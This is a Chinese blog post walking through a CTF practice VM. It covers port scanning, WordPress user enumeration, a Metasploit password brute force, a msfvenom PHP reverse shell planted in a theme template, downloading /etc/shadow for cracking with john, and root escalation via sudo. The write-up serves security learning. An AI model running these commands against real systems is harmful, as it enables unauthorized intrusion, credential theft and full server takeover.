CTF练习:HTTP服务之暴力破解

最新推荐文章于 2024-04-29 22:57:50 发布
最新推荐文章于 2024-04-29 22:57:50 发布
阅读量2.4k 收藏 9
点赞数 4
分类专栏: CTF入门练习 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/103335496
版权

CTF练习:HTTP服务之暴力破解


靶机地址:
链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg
提取码: t8uz

环境准备

开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。
查看攻击机kali的IP,为192.168.137.176
在这里插入图片描述
查看靶机的IP,为192.168.137.176

在这里插入图片描述
ping一下,测试连通性,没问题,开始信息收集。
在这里插入图片描述

信息收集

探测靶场开放的端口信息与服务版本

nmap -sV 192.168.137.197

在这里插入图片描述
使用nikto对开放的80端口进行进一步挖掘,发现可疑目录,/sercet/。

nikto -host http://192.168.137.197

在这里插入图片描述
把它粘贴到浏览器去访问一下

http://192.168.137.197/secret/

在这里插入图片描述
往下浏览,发现一个log in链接,点击
在这里插入图片描述
发现后台登录页面。
在这里插入图片描述

暴力破解

使用wpscan,获取目标网页的用户名,发现用户名admin。

wpscan --url 192.168.137.197/secret/ --enumerate u

在这里插入图片描述
得到了用户名,那接着使用metasploit对密码进行暴力破解。

启动
msfconsole  
选择模块
use auxiliary/scanner/http/wordpress_login_enum
查看参数
show options
设置目标ip
set rhosts 192.168.137.197
设置密码文件
set PASS_FILE /usr/share/wordlists/dirb/common.txt
设置我们已经知道的用户名admin
set username admin
设置目标uri
set targeturi /secret/
运行,开始破解
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
破解成功,用户名为admin,密码为admin。
在这里插入图片描述
去登录页面,输入admin和admin进入后台
在这里插入图片描述
在这里插入图片描述

制作与上传shell

使用msfvenom制作shell代码,将代码复制下来。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.137.176 lport=4444 -f raw

在这里插入图片描述
去到后台页面,点击右侧的Appearance的editor
在这里插入图片描述
再点击右侧的404 Template,将其代码替换成我们的shell代码
在这里插入图片描述
点击update file按钮提交,更新完成。
在这里插入图片描述
回到终端,使用msf监听4444端口

退出当前模块
back
使用监听模块
use exploit/multi/handler
设置为php模式
set payload php/meterpreter/reverse_tcp
查看参数
show options
设置kali的ip
set LHOST 192.168.137.176
开始监听
run

在这里插入图片描述
去浏览器访问shell所在的404页面。

192.168.137.197/secret/wp-content/themes/twentyseventeen/404.php

在这里插入图片描述
回到终端,已经返回了shell,sysinfo一下没问题。
在这里插入图片描述

进入靶机与提权

输入shell,id一下,是www-data用户,权限不够,需提权
在这里插入图片描述
下载/etc/passwd和/etc/shadow文件

download /etc/passwd
download /etc/shadow

在这里插入图片描述
新开一个终端,ls一下,可以看到下载的两个文件,使用unshadow进行整合

unshadow passwd shadow > cracked

在这里插入图片描述
使用john对生成的cracked进行解密,得到用户marlinspike与密码marlinspike
在这里插入图片描述
回到终端的shell,先优化终端一下

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
开始root提权操作

切换到marlinspike用户
su - marlinspike
查看权限
sudo -l
提权
sudo bash

在这里插入图片描述
进入到root目录,寻找flag文件。
在这里插入图片描述
这次靶机主要是相关的HTTP服务练习,并没有flag值,所以至此完工!!!

CNwanku
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTTP网页破解
05-28
HTTP网页破解
暴力破解HTTP验证
weixin_34248705的博客
01-01 535
首先,你总得有像样的字典吧。去国外网站上下wordlist吧,或者自己写个简单的程序来生成字典。如果不会写程序,呵呵呵呵,那就下载字典生成程序吧 。(不过网上下的wordlist,或者用网上下的字典生成程序生成的字典,好像都不好用) 其次,你总得有工具来运用字典干活吧。可以从网上下载工具,比如大名鼎鼎的brutus。Brutus 可以从 [url]http://www...
CTF-HTTP协议
最新发布
treeywind的博客
04-29 453
对于CTFHTTP协议题目的基本解法的笔记
【htpwdScan 是一个HTTP暴力破解、撞库测试工具。】
pqz1425374181的博客
03-23 9167
htpwdScan 是一个HTTP暴力破解、撞库测试工具。
Pikachu漏洞练习平台 之 暴力破解
m0_65712192的博客
10-30 696
Pikachu漏洞练习平台 之 暴力破解
CTF-HTTP
weixin_43070493的博客
03-19 778
CTF入门-HTTP请求方式 打开题目后,网页显示 HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 题解 windows 下:(使用python) from urllib import request req = request.Request(method = "CTFHUB"
CTF神器:自动爆破PNG图片宽高并一键修复工具
12-29
CTF(Capture The Flag)比赛中,Web解题部分经常会出现一些创新的挑战,其中一种是隐藏信息在看似普通的PNG图片中。这类题目通常需要参赛者挖掘图片的元数据或者利用图片格式的特殊性来发现隐藏的“Flag”。标题...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTF常用工具crc暴力破解
01-29
CTF常用工具crc暴力破解,根据不同需求选择不同字节的爆破密码,大大减少了爆破加密压缩包的时间可以实现不解密直接爆破出文件内的具体内容。
PNG图片宽高一把梭 ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解
02-07
ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 ...
CTF赛题:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
一个简单的HTTP暴力破解、撞库攻击脚本
热门推荐
帮你无忧
08-16 1万+
htpwdScan 是一个简单的HTTP暴力破解、撞库攻击脚本: 支持批量校验并导入HTTP代理,低频撞库可以成功攻击大部分网站,绕过大部分防御策略和waf 支持直接导入互联网上泄露的社工库,发起撞库攻击 支持导入超大字典 其他细微功能:随机X-Forwarded-For、随机SessionID,支持Basic Auth,支持MD5 Hash等 下面是几个简单示例HTTP Basic认证htpwdS
CTF入门--http请求头
Quartz's Blog
09-07 4916
这个也是很常见的操作,可能只能称为计算机使用技巧吧 通过修改referer字段,伪装自己从何而来初探题目 这里是要下载一个小文件,然而却被过滤了 显示如上图的内容开始分析http协议,是当前最多使用的互联网协议吧, 其中这就是请求头中用到的 两个: Referer: 作用: 提供了Request的上下文信息的服务器,告诉服务器我是从哪个链接过来的,比如从我主页上链接到一个朋友那里,
CTF之WEB学习——http请求方式
weixin_61167540的博客
11-21 744
是常用的命令行工具,用来请求 Web 服务器。它的名字就是客户端(client)的 URL 工具的意思。得到flag:ctfhub{c58e45f39e52486f411345e0}从题目中可以看出,需要使用的一种是CTFHUB 的请求方式才能拿到flag。参考各位大佬们的做法是用windows自带的curl——指定HTTP请求方法。这是这个题的解题重点。未指定请求方式默认为GET。
CTF中常用的http知识点总结
记录学习,一起进步
01-14 2097
CTF中常用的http知识点总结
WhaleCTF之web-http
weixin_30256505的博客
09-24 182
WhaleCTF之web-http呀 前往题目 不多说,看看源码 源码没有,抓包,发一下,也没有 猜测不是这个页面 burp抓包,把html改成php 发一下,在返回源码看到flag~ 转载于:https://www.cnblogs.com/lanyincao/p/11581988.html...
九头蛇hydra爆破http示例
墨痕诉清风的博客
02-23 3042
简单,一看必会
#ctf解题姿势#http协议
vircorns的博客
08-12 1267
小结指路 Method GET 参数数据跟在地址栏以后,以?开头,用&分割 明文传输,不适合提交敏感密码 四舍五入 bugku简单题目GET POST Hackbar或者cmd后curl -v URL -X POST -d post=flag 提交参数数据没有限制 bugku简单题目POST XCTF简单题目 HEAD PUT DELETE TRACE CONNECT O...
CTF_Web_HTTP协议
weixin_30433075的博客
11-18 695
HTTP简介 HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。 HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 查询结果等)。 HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信...
逆向分析5道CTF题目:密码破解与脱壳实战
本文档是一份针对五道CTF挑战题目的逆向分析write-up,详细介绍了如何解决Easy_Crack、Easy_UnpackMe、Replace、position和Easy_Keygen这五个挑战。这些题目涉及到了逆向工程中的不同技术和方法。 首先,以Easy_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值